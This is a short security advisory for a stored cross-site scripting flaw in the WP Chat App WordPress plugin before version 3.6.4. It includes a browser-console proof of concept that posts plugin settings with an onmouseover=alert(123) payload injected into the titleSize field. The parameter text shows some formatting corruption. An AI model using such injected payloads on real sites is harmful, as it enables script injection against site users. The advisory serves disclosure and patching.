WP Chat App < 3.6.4 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

PoC

1. Navigate to http://vulnerable-site.tld/wp-admin/admin.php?page=nta_whatsapp_floating_widget 2. Paste and run the following in your browser’s console: await fetch(“/wp-admin/admin-ajax.php”, { “credentials”: “include”, “headers”: { “Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8” }, “body”: title=Start+a+Conversation&isShowBtnLabel;=on&btnLabel;=Need+Help%3F+%3Cstrong%3EChat+with+us%3C%2Fstrong%3E&btnLabelWidth;=156&textColor;=%23fff&titleSize;=titleSize=18"//'+onmouseover=alert(123)//&descriptionTextSize;=12&accountNameSize;=14&regularTextSize;=11&backgroundColor;=%232db742&btnPosition;=right&btnLeftDistance;=30&btnRightDistance;=30&btnBottomDistance;=30&isShowPoweredBy;=on&scrollHeight;=500&responseText;=The+team+typically+replies+in+a+few+minutes.&description;=Hi!+Click+one+of+our+member+below+to+chat+on+%3Cstrong%3EWhatsApp%3C%2Fstrong%3E&gdprContent;=Please+accept+our+%3Ca+href%3D%22https%3A%2F%2Fninjateam.org%2Fprivacy-policy%2F%22%3Eprivacy+policy%3C%2Fa%3E+first+to+start+a+conversation.&time;_symbols%5BhourSymbol%5D=h&time;_symbols%5BminSymbol%5D=m&showOnDesktop;=on&showOnMobile;=on&displayCondition;=showAllPage&action;=njt_wa_save_design_setting&nonce;=${njt_wa['nonce']}, “method”: “POST”, “mode”: “cors” }); 3. Refresh the page, navigate to the “Design” tab and hover your mouse on Widget Font Size -> Title